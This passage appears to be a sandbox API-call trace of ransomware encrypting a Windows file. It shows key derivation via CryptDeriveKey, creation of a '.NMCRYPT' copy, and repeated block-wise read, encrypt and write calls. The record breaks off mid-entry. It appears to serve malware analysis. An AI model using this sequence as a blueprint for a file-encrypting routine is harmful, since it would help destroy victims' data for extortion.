[0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.008] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.009] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0144.009] CryptHashData (hHash=0x9820d0, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.009] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9820d0, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x982010) returned 1 [0144.009] CryptSetKeyParam (hKey=0x982010, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.009] CryptSetKeyParam (hKey=0x982010, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.009] wcslen (_String="\\\\?\\") returned 0x4 [0144.009] CryptDuplicateKey (in: hKey=0x982010, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x982110) returned 1 [0144.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1618 [0144.026] GetFileSizeEx (in: hFile=0x1618, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=27045) returned 1 [0144.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.026] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.027] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.028] GetLastError () returned 0x0 [0144.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.029] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.029] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.029] GetLastError () returned 0x0 [0144.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.030] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.030] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.031] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.031] GetLastError () returned 0x0 [0144.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.031] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.032] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.033] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.033] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.033] GetLastError () returned 0x0 [0144.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.033] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.033] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.033] GetLastError () returned 0x0 [0144.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.033] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.033] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.033] GetLastError () returned 0x0 [0144.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.033] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 